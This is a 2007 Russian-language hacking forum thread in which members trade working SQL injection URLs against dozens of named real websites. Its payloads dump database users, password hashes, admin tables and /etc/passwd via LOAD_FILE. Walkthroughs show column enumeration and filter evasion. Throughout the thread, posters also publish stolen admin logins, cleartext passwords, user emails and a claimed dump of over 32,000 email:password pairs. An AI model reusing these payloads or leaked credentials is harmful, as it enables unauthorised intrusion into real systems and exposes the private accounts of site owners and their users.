http://www.darkarmada.nl/CMS/forums/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%201,2/*
Вывод в title
__:)__
http://www.4iper.net/article.php?doc_id=-1+union+select+1,concat(database(),char(58),user() ,char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17/*
InferNo23
06.04.2007, 16:40
http://peoplehost.com/support/kb2.php?q_id=-1+union+select+1,concat(version(),char(58),user()) ,3,4,5,6,7/*
http://quizfarm.com/test.php?q_id=-1+union+select+1,concat(table_name,0x3a,version()) ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+INF ORMATION_SCHEMA.TABLES+limit+21,22/*
http://www.sinemrenault.com/trk/renault/haberler.php?H_ID=-1+union+select+1,convert(version()+using+latin1),3 ,4,5,6+from+users/*
http://www.radata.com/store/index.php?hid=-1+union+select+1,concat(convert(username+using+lat in1),0x3a,convert(password+using+latin1)),3+from+u ser+limit+0,1/*
http://www.mersin.edu.tr/icerik.php?hid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,concat(user,0x3a,passw ord),26+from+mysql.user/*
http://www.saglikbilgisi.com/haber.php?hid=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.use r/*
...
http://www.bendruomenes.lt/news.php?id='
...
вот щас очень занят а хотел поковырять --давайте сами =)
Наугад выбрал:
http://www.bendruomenes.lt/news.php?id=-1+UNION+select+1,2,3,4,5,concat(version(),char(58) ,user()),7,8,9,10/*
А вот здесь на сайте c приветствием "Welcome to my website. My name is Jem and I'm a l33t PHP ninja." версия выводится в строку адреса:
http://www.jemjabella.co.uk/postbyid.php?id=-1+UNION+SELECT+concat(version(),char(58),user())/*
Я долго ржал.
}{0TT@БЬ)Ч
06.04.2007, 18:46
2ShadOS
ну тогда уж сразу вывел бы данные или это уже не в моде? ;)
http://www.bendruomenes.lt/news.php?strid=-23412+union+select+concat(username,char(58),passwo rd)+from+users/*
http://www.oebu.ch/de/artikel.php?id=-324+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(versi on(),0x71),0x71)/*
http://www.rueleon.net/manifestations.php?Id=-51+union+select+LOAD_FILE(0x2f6574632f706173737764 )/*
http://www.spbdrive.ru/autoworld.php?news_id=-1+union+select+1,concat(database(),char(58),user() ,char(58),version()),3,4,5,6,7,8,9/*
http://www.spbdrive.ru/autoworld.php?news_id=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*
http://www.pomoyka.org/index.php?part=f&id=-1+union+select+1,convert(concat(database(),char(58 ),user(),version()),char),3,4/*
}{0TT@БЬ)Ч
06.04.2007, 20:02
2ShadOS
повидимому ты не прочитал предыдущий мой пост
http://www.avilys.lt/index.php?id='+UNION+select+concat(name,char(58),p ass)+from+admins/*
Constantine
06.04.2007, 20:19
боян, небоян хз.
Вытащил все, юзеров перебираем лимитом
http://www.cahiersdufoot.net/article.php?id=-1322+union+select+1,2,3,concat_ws(char(58),version (),user(),database()),user,password,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20+from+mysql.user/*
...
http://leidykla.ktu.lt/main.php?ID='
...
а вот здесь blind. У меня опыта маловато чтобы что-то сделать дальше:
http://leidykla.ktu.lt/main.php?ID=-1)+UNION+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
версия MySql
http://www.afghannews.net/index.php?newsgroup=6+union+select+null,VERSION(), null,null,null,null,null,null,null,null,null,null, null/*
логин текущего пользователя базы данных
http://www.afghannews.net/index.php?newsgroup=6+union+select+null,USER(),nul l,null,null,null,null,null,null,null,null,null,nul l/*
имя используемой базы данных
http://www.afghannews.net/index.php?newsgroup=6+union+select+null,DATABASE() ,null,null,null,null,null,null,null,null,null,null ,null/*
И ещё если за мест null поставить попарядку 1,2,3 .... то на страничке дабавится цифра 8 )))))
Информационный ресурс
http://www.rocit.ru/news/ITshownews.php3?id=-19060+union+select+1,2,3,4,5,6,7,convert(concat(da tabase(),char(58),user(),version()),char),9,10/*
iran.ru
http://iran.ru/rus/print_news.php?news_id=-36994+union+select+1,2,convert(concat(database(),c har(58),user(),version()),char),4,5,6,7,8/*
http://e-price.org.ua/index.php?parent=1&navop=1&area=1&p=shop&show=showdetail&fid=K-10001&categ=-3+union+select+1,convert(version()+using+latin1),3/*
http://www.microsym.com/content/index.php?pid=3&id=-11+union+select+1,database()--
:)
beermarket.ru
Инет-магаз
http://www.beermarket.ru/catalog/catalog.php3?id=-1+union+select+1,2,concat(database(),char(58),user (),char(58),password,char(58),version()),4,5+from+ users/*
Наша цель :
www.rsi.ru
Имя базы:
http://www.rsi.ru/News/news.asp?id=2354+or+2354=(select%20db_name())--
Наш юзверь:
http://www.rsi.ru/News/news.asp?id=2354+or+2354=(select%20system_user)--
Версия:
http://www.rsi.ru/News/news.asp?id=2354+or+2354=@@version--
перебераем таблицы:
http://www.rsi.ru/News/news.asp?id=2354+or+2354=(SELECT+TOP+1+TABLE_NAME+ FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NO T+IN+('T_LastDat','ORDERS','ClientShort','cnf_gree nwood','cnf_rsi','cnf_rsi_parts','cnf_rsi_s','cnf_ rsi_users'))--
Теперь перебераем колонки :
http://www.rsi.ru/News/news.asp?id=2354+or+2354=(SELECT+TOP+1+COLUMN_NAME +FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME= 'cnf_rsi_users'+AND+COLUMN_NAME+NOT+IN+('user','u_ id','user_nm','user_bd'))--
http://www.zondmarket.ru/?p=8&t=2&idst=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5,6,7/*
http://www.zondmarket.ru/?p=8&t=2&idst=-1+union+select+1,2,concat(login,char(58),pass,char (58),name,char(58),prof,char(58),firma,char(58),pr oduction,char(58),email,char(58),adress,char(58),t elefon),4,5,6,7+from+registration+limit+10,1/*
http://www.idc.ul.ie/people.php?id=-42%20UNION%20SELECT%201,2,3,user,password,6,7,8,9, 10,11,12+from+mysql.user/*
http://www.idc.ul.ie/people.php?id=-42%20UNION%20SELECT%201,2,3,4,LOAD_FILE(0x2f657463 2f706173737764),6,7,8,9,10,11,12/*
http://www.socs.nuigalway.ie/list_socs/viewSoc.php?id=-47+union+select+1,2/*глухарь =\
http://exploits.elemneo.pl/index.php?download=-1+union+select+1,version(),3,4,5,6/*
скуля в базе сплойтов))
Зараннее говорю - вы не подумайте, я в гугле набирал сайт занкомств!!! =)))
Кстати, обратите внимание на гламурную ссылку на главной странице - admin...
Решил чуток расписать...
Обращаем внимание на то, что при $link = 2-1 картинка снизу соответствует $link = 1.
http://www.freelove.in.ua/link.php?link=2-1/*
Подбираем кол - во столбцов
http://www.freelove.in.ua/link.php?link=2+order_by+64/*
Смотрим версию.
http://www.freelove.in.ua/link.php?link=20000+union+select+1,version(),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56, 57,58,59,60,61,62,63,64/*
Так как 5 - ая версия, можно посмотреть таблицы, колонки.
http://www.freelove.in.ua/link.php?link=20000+union+select+1,TABLE_NAME,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58,59,60,61,62,63,64+from+INFORMATION_SCHEMA.T ABLES+limit+0,1/*
Конечно можно порадоваться таблице users, в которой записаны логины и пассы в чистом виде, но админа там нет, а кому нужны акки на этом сайте? ;)
Поэтому идем в таблицу adminip и перебираем там колонки...
http://www.freelove.in.ua/link.php?link=20000+union+select+1,COLUMN_NAME,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,5 6,57,58,59,60,61,62,63,64+from+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME='adminip'/*
Бамс! 1 - ая колонкка и сразу pass. Ну что ж...
http://www.freelove.in.ua/link.php?link=20000+union+select+1,pass,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 ,59,60,61,62,63,64+from+adminip/*
Админка наша, победа нафиг! =D
admin:q1a2z3x4s5w6e7d8c9v0 ( http://www.freelove.in.ua/admin.php )
Ps писанины стокоо...))
alextoun
07.04.2007, 00:13
самописные форумы-это плохо
http://www.f1-world.ru/forum/message.php3?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
пойду дальше
http://www.f1-world.ru/forum/message.php3?id=-1+union+select+1,version(),3,4,user(),6,7,8,databa se(),10,11,12,13,14/*
http://www.optimed.ru/index.php?area=prod&part=-1+union+select+1,2,version(),4,5,6,7,8/*
http://www.optimed.ru/admin/
мб админская таблица и есть, но я ее не нашел)
alextoun
07.04.2007, 00:34
http://www.optimed.ru/index.php?area=prod&part=-1+union+select+1,user(),version(),database(),5,6,7 ,8/* ух ты валуехост
позже: хз не нашёл больше, спать надо
alextoun
07.04.2007, 00:54
http://www.maska-mix.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/не подобрал
уже голова не варит
Thanat0z
07.04.2007, 00:54
http://onanistov.net/kb.php?mode=cat&cat=-3+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(us ername,char(58),user_password),0),0),3,4,5,66,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20f rom%20phpbb_users+limit+1,1/*
Thoral:cd0d2dcda0f8df2960f53e8dd699fdab
Kamaz привет ;)
Thanat0z
07.04.2007, 02:26
http://www.fighterfitnessforum.com/kb.php?mode=cat&cat=2%20union%20select%201,AES_DECRYPT(AES_ENCRYPT (concat(username,char(58),user_password),0),0),3,4 ,5,6%20from%20phpbb_users+limit+2,1/*
Björn:e786b2a1c90f80c0e7a674464f995b1a:grappling
http://www.worldwidedvdforums.com/kb.php?mode=cat&cat=-71%20union%20select%201,AES_DECRYPT(AES_ENCRYPT(co ncat(username,char(58),user_password),0),0),3,4,5, 6%20from%20phpbb_users%20limit%201,2/*
Камаз ;)
Вывод в тайтле. 5 версия, но все прямые запросы с "from" блочит. Гифровать не пробовал(
http://www.dosgames.ru/index.php?action=game&act=sub&id=3300+union+select+1,version(),3,4,5,6,7,8,9,10, 11,12,13/*
Пасы не нашел
http://nfs.com.ua/file_details.phtml?id=341+union+select+1,2,3,4,5,6 ,7,name,9,10,11,12,13,14,15,16,17,18,19,20+from+me mbers+limit+1,1/*
походу пассы в 'pass', в остальных случаях выдает ошибку..
http://nfs.com.ua/file_details.phtml?id=341+union+select+1,2,3,4,5,6 ,7,concat(name,0x3a,pass),9,10,11,12,13,14,15,16,1 7,18,19,20+from+members+limit+5,1/*
либо логин в другой, либо справа не та форма авторизации..
странно, почему у всех 'name' префикс USSRx и почему все 'pass' 4хзначные..
http://www.christymoore.com/lyrics_tabs_detail.php?id=-18%20UNION%20SELECT%201,2,table_name,4,5,6+from+IN FORMATION_SCHEMA.TABLES+limit+25,1/*
http://www.christymoore.com/lyrics_tabs_detail.php?id=-18%20UNION%20SELECT%201,2,concat(username,0x3a,pas sword),4,5,6+from+admin/*
www.christymoore.com/admin
name: christymoore
pass:cmbb
http://www.cttc.ie/memberdetails.php?id=-27+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(email, 0x71),0x71),4,5,6,7,8,9,10+from+members/*
таблицы не нашел=\
таблица юзер
http://avia-model.ru/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,name,username,passwd ,email)+from+user/*
шоп
имя:логин:хеш:мыло
таблица админ
http://avia-model.ru/show_cat2.php?grid=-1+union+select+concat(username,0x3a,password)+from +admin/*
пароли все в mysql4
пока не расшифровал =\
Первый скуль. http://projectors.toshiba.com.ru/news/list/show/?newsid=-27+union+select+1,2,database(),4,concat(user(),0x3 a,version()),6,7,8,9,10,11,12, 14/*
походу пассы в 'pass', в остальных случаях выдает ошибку..
http://nfs.com.ua/file_details.phtml?id=341+union+select+1,2,3,4,5,6 ,7,concat(name,0x3a,pass),9,10,11,12,13,14,15,16,1 7,18,19,20+from+members+limit+5,1/*
либо логин в другой, либо справа не та форма авторизации..
странно, почему у всех 'name' префикс USSRx и почему все 'pass' 4хзначные..
Там вобще какая-то странная скуля =\
http://nfs.com.ua/forum/index.php?act=Online&st=-1
НО :
http://nfs.com.ua/file_details.phtml?id=341+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+ibf_m embers/*
http://www.stpatsfc.com/news.php?id=-1463+union+select+1,2,3,4,concat(password,0x3a,ema il),6+from+members/*
http://stpatsfc.com/admin/ меня наверное глючит но на админке нету пароля:)))))))))
clubclass04: pillocks
http://www.glidingteam.co.uk/competitions/2006/nzgrandprix/viewnewsarticle.php?id=-184+union+select+1,2,3,4,5,concat(username,0x3a,pa ssword),7,8,9,10,11,12,13,14,15+from+users/*
-
http://www.karmichaelhr.com/pages/viewnewsarticle.php?article=6+union+select+1,conca t(database(),0x3a,version()),3,4/*
alextoun
07.04.2007, 14:43
http://mrg.net.ru/showrel07.php?ID=-1+union+select+1,2,3,4/*
сим-рейсинг
alextoun
07.04.2007, 15:05
http://www.cyberacing.ru/index.php?lang=ru&p=105&action=topic&id=-1+union+select+1,2,3,4,5,6,7/*
гы а я тут как то участвовал)) дальше не полезу, носков нету, а то забанят ещё)
alextoun
07.04.2007, 15:08
http://www.cyberacing.ru/index.php?lang=ru&p=105&action=storage&stamp=-1+union+select+1,2,3,4,5,6,7/*
в самом низу
http://www.tass-ural.ru/news/?id=-1+union+select+1,concat(database(),char(58),user() ,char(58),version())/*
http://www.tass-ural.ru/news/?id=-1+union+select+1,table_name+from+information_schem a.tables+limit+52,1/*
http://www.tass-ural.ru/news/?id=-1+union+select+1,table_name+from+information_schem a.tables+limit+55,1/*
http://www.tass-ural.ru/news/?id=-1+union+select+1,column_name+from+information_sche ma.columns+where+table_name=char(109,101,109,98,10 1,114)+limit+0,1/*
http://www.tass-ural.ru/news/?id=-1+union+select+1,convert(concat(id,char(58),fio,ch ar(58),job),char)+from+member+limit+0,1/*
http://www.skladcd.com/?index=3&cat=4&cdinfo=-1+union+select+concat(database(),char(58),user(),c har(58),version()),2,3,4/*
http://www.marycoughlanmusic.com/shop.php?id=-47%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12+f rom+admin/*
чето нигде не выводит
alextoun
07.04.2007, 16:30
2alextoun
там какая то хрень с кодировками
всё там нормально
»Atom1c«
07.04.2007, 16:59
http://www.yarnovosti.com/index.php?mod=news&cid=4&id=8262-4+union+select+1,2,3,4,5,6,7,VERSION(),9,10,11,12, 13,14,15,16,17,18,19/*
http://www.yarnovosti.com/index.php?mod=news&cid=4&id=8262-4+union+select+1,2,3,4,5,6,7,DATABASE(),9,10,11,12 ,13,14,15,16,17,18,19/*
http://www.yarnovosti.com/index.php?mod=news&cid=4&id=8262-4+union+select+1,2,3,4,5,6,7,USER(),9,10,11,12,13, 14,15,16,17,18,19/*
Ярновасти...
http://www.gapr.ru/RUS/news.php?newsID=100000000+union+select+1,convert(c oncat(database(),char(58),user(),char(58),version( )),char),3,4,5/*
http://www.gapr.ru/RUS/news.php?newsID=100000000+union+select+1,convert(c oncat(user,char(58),password),char),3,4,5+from+mys ql.user+limit+0,1/*
http://www.gapr.ru/RUS/news.php?newsID=100000000+union+select+1,convert(c oncat(id,char(58),email,char(58),passwd),char),3,4 ,5+from+user/*
www.internetua.com - украинский журнал об Интернете
http://www.internetua.com/vote/?v2=-1+union+select+1,2,3,4,5,6,7,8/*
Админка
http://www.internetua.com/admin/
Кто расковыряет дальше, отпишите..
О, моя самая жирная скуля!!!
Более 32 000 юзеров!
Пасы без шифроовки!
mail : pass
http://www.sovetnik.ru/prnews/rus/more/?id=19738000+union+select+1,concat(email,char(58), pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22+from+users+limit+32000,100/*
to Goudini
http://www.internetua.com/vote/?v2=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(da tabase(),char(58),user(),char(58),version()),0x71) ,0x71),3,4,5,6,7,8/*
http://www.internetua.com/vote/?v2=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(table_nam e,0x71),0x71),3,4,5,6,7,8+from+information_schema. tables+limit+16,1/*
http://www.phpvillage.org/member.php?idu=-1755+union+select+1,2,concat(version(),char(58),us er()),4,5,6,7,8,9,10,11,12,13,14,15/*
http://www.x-cosmos.it/uffici/index.php?idU=-45+union+select+1,2/*
http://www.vokrugsveta.ru/publishing/vs/archives/?item_id=-1+union+select+concat(database(),char(58),user(),c har(58),version()),2,3,4,5,6,7,8,9,10,11/*
http://www.metallomarket-m.ru/produkt.php?type_id=-1+union+select+1,2,3,concat(database(),char(58),us er(),char(58),version()),5,6/*
http://www.eko.net.ua/index.php?page=docs&id=-26+UNION+SELECT+1,2,3,database(),4,5,6,7,8/*
http://www.eko.net.ua/index.php?page=docs&id=-26+UNION+SELECT+1,2,3,user(),4,5,6,7,8/*
http://www.eko.net.ua/index.php?page=docs&id=-26+UNION+SELECT+1,2,3,Version(),4,5,6,7,8/*
www.rssmix.com/
http://www.rssmix.com/engine.php?mix_id=-20476/**/union/**/select/**/concat(user,0x3a,password)/**/from+mysql.user/*
Пасса походу нет =\
http://gta.com.ua/file_details.phtml?id=-802+union+select+1,2,3,concat(user(),char(58),data base(),char(58),version()),5,6,7,username,password ,10,11,12,13,14,15,16,17,18,19,20+from+admin/*
username == admin
password == 2IsfJILPkOJ2
user == gtacom_gta@localhost
database == gtacom_gta
version == 4.1.21-standard
Хз где админка можно залесть так:
http://domen.com.ua/
Только нужен id :(
Тур агентство.
http://sputnik.kiev.ua/catalog/index.php?turs=18&id_c=-33+union+select+1,concat(version(),char(58),user() ,char(58),database())/*
http://palestra.pucp.edu.pe/index.php?id=-151%20UNION%20SELECT%200,password,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16%20from%20users/*
http://www.netspective.com/community/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%201,2/*
http://smashbros.bobsnox.com/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%201,2/*
http://www.imoc.co.uk/forums/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%201,2/*
__:)__
http://town-of-masters.spb.ru/main.php?enter=cat&tovid=-1+union+select+1,concat(database(),char(58),user() ,char(58),version()),3/*
http://town-of-masters.spb.ru/main.php?enter=cat&tovid=-1+union+select+1,table_name,3+from+information_sch ema.tables+limit+37,1/*
http://town-of-masters.spb.ru/main.php?enter=cat&tovid=-1+union+select+1,concat(id,char(58),namek,char(58) ,t),3+from+tom_tabless+limit+0,1/*
http://www.radata.com/store/index.php?hid=-1+union+select+1,2,convert(concat(username,0x3a,0x 3a,0x3a,password)+using+latin1)+from+user/*
:)
}{0TT@БЬ)Ч
07.04.2007, 23:01
http://www.photostars.ru/news/event.htm?id=63'+union+select+1,2,3,4,concat(user, char(58),password),6,7+from+mysql.user/* прокручиваем в самый низ
http://www.latinoreview.com/news.php?id=-1369'+union+select+1,2,version(),4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,user(),database()/*
http://www.ebooklobby.com/index.php?cid=44+union+select+1,2,version(),4/* :)
http://www.arabmonitor.info/news/dettaglio.php?idnews=-7070+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+ users/*
http://www.crenos.it/news/singnews.php?idnews=-28+union+select+1,password,3,4,5,6,7,8,9,10+from+m ysql.user/*
хмм, страно =\ не могу вывести юзверя, зы: много пивка выпил наверно =)
2zl0ba
http://www.crenos.it/news/singnews.php?idnews=-28+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(u ser,char(58),password),0),0),3,4,5,6,7,8,9,10+from +mysql.user/*
И второй сайт:
http://www.arabmonitor.info/dettaglio.php?idnews=-18416%20union%20select%201,column_name,3,4,5,6,7,8 ,9,0,11,12%20from%20information_schema.columns%20w here%20table_name=char(117,115,101,114,115)/*&lang=it
http://www.arabmonitor.info/dettaglio.php?idnews=-18416%20union%20select%201,concat(id,char(58),emai l,char(58),paese,char(58),password),3,4,5,6,7,8,9, 0,11,12%20from%20users%20limit%201,2/*&lang=it
www.sport.is
http://www.sport.is/fullfrettir.php?idnews=-4936+union+select+1,2,concat(name,0x3a,password),4 +from+users/*&idcat=10
admin:markme http://forum.antichat.ru/images/icons/icon10.gif
www.daoiststudies.org
http://www.daoiststudies.org/scholars.php?cmd=list&userid=-863+union+select+1,concat(email,0x3a,password),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+members/*
gao.deng@btinternet.com:queriooz2 http://forum.antichat.ru/images/icons/icon10.gif
=\\ http://www.kuraraydental.com/
Inj:
http://www.kuraraydental.com/viewproduct.php?pid=-19+union+select+1,2,3,4,5,6,7,8,9,10,concat(userna me,0x3a,password),12+from+user
Админку не искал. Погонять по лимиту, можно выцепить других юзеров.
admin:chris-ko
[sL1p], _ttp://radata.com я выложил на предыдущей странице :Р
VampiRUS
08.04.2007, 11:13
http://www.barsavto.ru/?_pageid=8&cat_id=-1+union+select+USER()/*&id=158
http://www.svrauto.ru/?pageId='+union+select+1,2,3,convert(USER()+using+ cp1251),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9/*
чет накаких интересны таблиц ненашёл
http://www.realhit.ru/?page=news&id=-1+union+select+null,version(),null/*
http://www.realhit.ru/?page=news&id=-1+union+select+null,database(),null/*
http://www.realhit.ru/?page=news&id=-1+union+select+null,user(),null/*
http://www.marycoughlanmusic.com/shop.php?id=-47%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12+f rom+admin/*
чето нигде не выводит
У меня всё прекрасно выводит:
_http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,USER(),4,version(),database(),7 ,8,9,10,11,12/*
Но как только обращаешься к таблице, то пусто. Какая-то хитрая фильтрация. Кто знает что здесь сделать? Оч. Интересно.
mafiaclub.ru
http://www.mafiaclub.ru/gallery/user.php?gid=-1+union+select+1,2,3,concat(username,0x3a,user_pas sword),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+fro m+bb_users+limit+1,1/*
phpbb хеш админа
там 5 админов, перебор лимитами.
http://www.atlasaerospace.net/newsi-r.htm?id=-1+union+select+1,2,3,concat(database(),char(58),us er(),char(58),version()),5,6,7/*
http://www.atlasaerospace.net/newsi-r.htm?id=-1+union+select+1,2,3,4,5,6,7+from+orders/*
http://www.atlasaerospace.net/newsi-r.htm?id=-1+union+select+1,2,3,concat(name,char(58),email,ch ar(58),phone),5,6,7+from+orders/*
Но как только обращаешься к таблице, то пусто. Какая-то хитрая фильтрация. Кто знает что здесь сделать? Оч. Интересно.
Такая же трабла.
http://pride.uoregon.edu/section.php?id=-1+union+select+1,user(),2,3,4,5/*
http://pride.uoregon.edu/section.php?id=-1+union+select+1,user(),2,3,4,5/*
http://pride.uoregon.edu/section.php?id=-1+union+select+1,user(),2,3,4,5/*
Территория
http://www.it-territory.ru./img/logo.gif
===============
www.it-territory.ru
===============
http://www.it-territory.ru./index.php?obj=press&id=136+union+select+1,version(),3,4/*
Список статей, самый низ
Кто достанет нам новый апдейт Территории?:)
http://www.sequelvc.com/index.php?page=news&id=843+union+select+concat(database(),0x3a,version ()),2/*
http://www.vingarbutt.com/index.php?page=news&more=1&id=-69+union+select+1,2,3,4,5,6,7,email,9,10+from+user s+limit+5/*
http://www.iratiwanti.org/iratiwanti.php3?page=news&id=-242+union+select+1,2,3,4,5,6,7,8,9/*
Constantine
08.04.2007, 15:50
У меня всё прекрасно выводит:
_http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,USER(),4,version(),database(),7 ,8,9,10,11,12/*
Но как только обращаешься к таблице, то пусто. Какая-то хитрая фильтрация. Кто знает что здесь сделать? Оч. Интересно.
У меня все выводиться
http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,3,4,5,TABLE_NAME,7,8,9,10,11,12 +from+INFORMATION_SCHEMA.TABLES+limit+2,2/*
лимитом перебираем таблицы, подом колонки получаем базу.
управление:Opera 9.10
Constantine, а из таблицы admin почему тогда данные не выводятся? Таблица присутствует:
http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,3,4,TABLE_NAME,6,7,8,9,10,11,12 %20+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*
Так что извиняй, это не то что хотелось бы. Дело в том, что даже простое обращение типа вот этого:
http://www.marycoughlanmusic.com/shop.php?id=-47+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12+from+ad min/*
Уже не работает!
Опять времени много =)
Цель - www.gamesplay.ru
Заходим по первой попавшейся ссылке. Видно, что движок самописный... Сразу же начинаем пихать левые параметры...
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=421-1
Название игры не меняется, так как за вывод названия отвечает другая переменная. Меняется само описание, так что все ок!
Подбираем стотлбцы и зануляем запрос.
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=420+order+by+5
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=420+union+select+1,2,3,4,5
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=420000+union+select+1,2,3,4,5
Теперь пробуем вывести чуток данных из таблицы.
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=420000+union+select+1,2,user(),4,5
Облом, други! Но мы то с вами не так себе, прорвемся! ;)
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=420000+union+select+1,2,aes_decrypt(aes_en crypt(user(),0x55),0x55),4,5
Теперь все ок. Ну а дальше...
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=420000+union+select+1,2,aes_decrypt(aes_en crypt(column_name,0x55),0x55),4,5+from+information _schema.columns+where+table_name='users'
Итак, финал!
login : md5(pass) : mail : icq
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=420000+union+select+1,2,aes_decrypt(aes_en crypt(concat(user_login,char(58),user_pass,char(58 ),user_mail,char(58),user_icq),0x55),0x55),4,5+fro m+users
PS Пользователей не считал, но очень много =)
www.generationsims2.com
фанатам Sims 2 посвящаеться:
http://www.generationsims2.com/news_com.php?idnews=-1+union+select+1,concat(user_id,0x3a,user_password ),3,4,5+from+phpbb_users/*
http://gorodok.samaratoday.ru/showNews.php?idnews=-1385+union+select+1,2,USER(),4,5,6,7,8,9,10/*
самара =\
http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1+UNION+SELECT+1,database(),2,3,5,6,7,8,9/*
http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1+UNION+SELECT+1,version(),2,3,5,6,7,8,9/*
http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1+UNION+SELECT+1,user(),2,3,5,6,7,8,9/*
http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1+union+select+1,password,3,4,5,6,7,8,9+from+mysql .user/*
http://www.elementemag.com/detail.php?page=news&id=14+union+select+1,2,3,4,5,concat(user,0x3a,pass word),7+from+mysql.user+limit+2/*
}{0TT@БЬ)Ч
08.04.2007, 16:50
PS Пользователей не считал, но очень много =)считать их не надо :D они вычисляются тем же самым limit'ом,юзеров 13549 ;)
http://z04.kazantipa.net/index.php?m1=1&m0=8&act=TopicLover&id=-430+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
мертвая скуля...
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot